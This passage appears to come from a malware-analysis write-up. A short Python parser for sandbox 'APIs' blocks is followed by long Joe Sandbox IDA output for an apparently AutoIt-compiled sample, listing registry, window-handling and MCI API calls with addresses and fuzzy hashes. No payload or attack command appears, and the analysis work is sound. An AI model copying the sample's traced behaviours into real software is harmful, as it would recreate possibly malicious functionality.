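        calls = parse_api_block(block)
        print(f"{label}: {len(calls)} calls, capabilities={match_capabilities(calls)}, "
              f"dynamic imports={resolved_imports(calls)}")
```

Run against a whole report, the same parser can be fed each "APIs" block in turn so that the rule hits line up with the "ref:" addresses, which is what makes them usable as pivots in the memory dump. The default of ignoring "Part of subcall function" lines matters for precision: those lines describe callees, and counting them attributes a callee's APIs to every caller that reaches it.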

                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 00BDDAA1
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD659
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD66B
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD67D
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD68F
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6A1
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6B3
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6C5
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6D7
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6E9
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD6FB
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD70D
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD71F
                                                                        • Part of subcall function 00BDD63C: _free.LIBCMT ref: 00BDD731
                                                                      • _free.LIBCMT ref: 00BDDA96
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDDAB8
                                                                      • _free.LIBCMT ref: 00BDDACD
                                                                      • _free.LIBCMT ref: 00BDDAD8
                                                                      • _free.LIBCMT ref: 00BDDAFA
                                                                      • _free.LIBCMT ref: 00BDDB0D
                                                                      • _free.LIBCMT ref: 00BDDB1B
                                                                      • _free.LIBCMT ref: 00BDDB26
                                                                      • _free.LIBCMT ref: 00BDDB5E
                                                                      • _free.LIBCMT ref: 00BDDB65
                                                                      • _free.LIBCMT ref: 00BDDB82
                                                                      • _free.LIBCMT ref: 00BDDB9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 3eb781de87d3da5c8c44c8539c5e7bf1a3b7062f50dadc82918479f10d7f7300
                                                                      • Instruction ID: e223bb26a51d9ea730e9cc9c2287456d3a94fc1fb92a36635a21e916effad5ef
                                                                      • Opcode Fuzzy Hash: 3eb781de87d3da5c8c44c8539c5e7bf1a3b7062f50dadc82918479f10d7f7300
                                                                      • Instruction Fuzzy Hash: DE315A356046459FEB21AB38E845B6AF7E8FF10314F1584ABE489D7391FA34AC409B20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C0369C
                                                                      • _wcslen.LIBCMT ref: 00C036A7
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C03797
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C0380C
                                                                      • GetDlgCtrlID.USER32 ref: 00C0385D
                                                                      • GetWindowRect.USER32(?,?), ref: 00C03882
                                                                      • GetParent.USER32(?), ref: 00C038A0
                                                                      • ScreenToClient.USER32(00000000), ref: 00C038A7
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C03921
                                                                      • GetWindowTextW.USER32 ref: 00C0395D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                                      • Instruction ID: 8de6e12f5f6a555d261b9e6daa6b5b5c8c73d761f517ce660d75ff8fe8af9335
                                                                      • Opcode Fuzzy Hash: 6565902acb1d345fa174629a84ae3e51fb938cad81489d18f656053019c11cd8
                                                                      • Instruction Fuzzy Hash: CE918C71204646AFDB19DF24C885FAAB7ECFF44350F008629F9A9D21D1DB30EA55CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C04994
                                                                      • GetWindowTextW.USER32 ref: 00C049DA
                                                                      • _wcslen.LIBCMT ref: 00C049EB
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00C049F7
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C04A2C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04A64
                                                                      • GetWindowTextW.USER32 ref: 00C04A9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00C04AE6
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00C04B20
                                                                      • GetWindowRect.USER32(?,?), ref: 00C04B8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                                      • Instruction ID: 4a447998a54827e620849f869387d999732e62eec11d0ac52c9e8562a894913a
                                                                      • Opcode Fuzzy Hash: 71845048ac4aa543b684155eeb36bcb2ece8c145160158a26521ee4cd9ad2c36
                                                                      • Instruction Fuzzy Hash: 5A919CB21082059BDB18DF14C985FAB77E8FF84354F048469FE959A0D6EB30EE45CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • PostMessageW.USER32 ref: 00C38D5A
                                                                      • GetFocus.USER32 ref: 00C38D6A
                                                                      • GetDlgCtrlID.USER32 ref: 00C38D75
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C38E1D
                                                                      • GetMenuItemInfoW.USER32 ref: 00C38ECF
                                                                      • GetMenuItemCount.USER32(?), ref: 00C38EEC
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00C38EFC
                                                                      • GetMenuItemInfoW.USER32 ref: 00C38F2E
                                                                      • GetMenuItemInfoW.USER32 ref: 00C38F70
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C38FA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1026556194-4108050209
                                                                      • Opcode ID: 8e00259de30f967fa17e90e1e23b19be693b4931d8a61c5fcdb8a8517c89394f
                                                                      • Instruction ID: 54b9bc9255a1a2ce1042d32657c922e723273af9aca3f4d11a6f07f1f21db1a6
                                                                      • Opcode Fuzzy Hash: 8e00259de30f967fa17e90e1e23b19be693b4931d8a61c5fcdb8a8517c89394f
                                                                      • Instruction Fuzzy Hash: BC81CF715183019FDB20CF24C884AAFBBE9FF88314F14095DF9A4A7291DB70DA08DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C2CC64
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2CC8D
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD48
                                                                        • Part of subcall function 00C2CC34: RegCloseKey.ADVAPI32(?), ref: 00C2CCAA
                                                                        • Part of subcall function 00C2CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C2CCBD
                                                                        • Part of subcall function 00C2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 00C2CCCF
                                                                        • Part of subcall function 00C2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C2CD05
                                                                        • Part of subcall function 00C2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C2CD28
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C2CCF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2734957052-4033151799
                                                                      • Opcode ID: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
                                                                      • Instruction ID: 0e58cf50d1e116c287d4149a66197beb8a184db695e6b8c52b49a2c846b64817
                                                                      • Opcode Fuzzy Hash: f3bd8e2c752665007434adedbdf21698e20e75d6a941434c1bf78b294d5364d8
                                                                      • Instruction Fuzzy Hash: EE315A76901129BBDB208B65ECC8FFFBB7CEF45750F000165E916E3240DA749A45ABA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00C0E6B4
                                                                        • Part of subcall function 00BBE551: timeGetTime.WINMM ref: 00BBE555
                                                                      • Sleep.KERNEL32(0000000A), ref: 00C0E6E1
                                                                      • EnumThreadWindows.USER32 ref: 00C0E705
                                                                      • FindWindowExW.USER32 ref: 00C0E727
                                                                      • SetActiveWindow.USER32 ref: 00C0E746
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C0E754
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C0E773
                                                                      • Sleep.KERNEL32(000000FA), ref: 00C0E77E
                                                                      • IsWindow.USER32 ref: 00C0E78A
                                                                      • EndDialog.USER32 ref: 00C0E79B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
                                                                      • Instruction ID: 3ada18c06d76c8fb49f3d3e6b204ad62943dbf76e9a2c520443a1bd2a4e04ceb
                                                                      • Opcode Fuzzy Hash: 4e0b38c9e1dd85083a57bcf917b7320e26c9788b2e8b0b1cabab5acd3159cf4f
                                                                      • Instruction Fuzzy Hash: 7C21A570250604AFEB106F64ECC9B2D3B6DF754389F140825F91AD11F1DB71AC40EB24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C0EA5D
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C0EA73
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C0EA84
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C0EA96
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C0EAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
                                                                      • Instruction ID: 4682a41bcde6883a448c531ccc4dc2c5da70cbf21a7ea02c60dceae94b16deac
                                                                      • Opcode Fuzzy Hash: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
                                                                      • Instruction Fuzzy Hash: 82113731A9426979D720A762DC8AEFF6ABCEFD6F40F4408797811A20D1EFB05A45C5B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSysColorBrush.USER32 ref: 00BA2D07
                                                                      • RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                                      • LoadIconW.USER32 ref: 00BA2D85
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                                      • Instruction ID: 1db19bc23099b8cbce6645c38330fe09e18854f7c3ef2235aeac71814e8b2a6f
                                                                      • Opcode Fuzzy Hash: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                                      • Instruction Fuzzy Hash: A621C4B5921319AFDB00DFA8EC89BDDBBB4FB08700F04411AFA15B62A0D7B54584CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00C05CE2
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C05CFB
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004), ref: 00C05D59
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00C05D69
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C05D7B
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004), ref: 00C05DCF
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C05DDD
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C05DEF
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C05E31
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C05E44
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C05E5A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C05E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
                                                                      • Instruction ID: ca8fa57b947c29638b57150983c5e5462b3b5107dcc79e2affd03a4a2f926d79
                                                                      • Opcode Fuzzy Hash: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
                                                                      • Instruction Fuzzy Hash: BA51FBB5A10619AFDF18CF68DD89BAEBBB9EB48300F148129F915E6290D7709E04CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00BB8FC5
                                                                      • DestroyWindow.USER32 ref: 00BB8C81
                                                                      • KillTimer.USER32 ref: 00BB8D1B
                                                                      • DestroyAcceleratorTable.USER32 ref: 00BF6973
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69A1
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69B8
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000), ref: 00BF69D4
                                                                      • DeleteObject.GDI32(00000000), ref: 00BF69E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
                                                                      • Instruction ID: eb75d58a7200ef7ff1b63fcda1c3751f2b41e30eddfcddfcc0b2425ad0b056f4
                                                                      • Opcode Fuzzy Hash: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
                                                                      • Instruction Fuzzy Hash: B261DB31012604DFCB259F18C989BBD7BF5FB04312F1884ACEA469B5A0CBB1A8C5DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      • GetSysColor.USER32 ref: 00BB9862
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
                                                                      • Instruction ID: 10383beb601937148f7ac33d2ceff3f7cad851ce27fb6e5e4ce9d103433005e7
                                                                      • Opcode Fuzzy Hash: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
                                                                      • Instruction Fuzzy Hash: 51417C31144644AFDB215B389C88BBD3BF5EB16370F144699FAB2972E1D7B19842EB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                      • String ID: 8X
                                                                      • API String ID: 1282221369-771344844
                                                                      • Opcode ID: bf1ff3fd310610dc096577bcb3812abe5ea0652f15e8293fd69c1989570a95ce
                                                                      • Instruction ID: e40bd1277902ec4af53692416abe08fffaafe8b42ae8396c1e549099cd966c53
                                                                      • Opcode Fuzzy Hash: bf1ff3fd310610dc096577bcb3812abe5ea0652f15e8293fd69c1989570a95ce
                                                                      • Instruction Fuzzy Hash: 7B610FB1904342AFDB21AFB49895BADFFE5EF11310F1441EBE94497382F6319905D790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C09717
                                                                      • LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09720
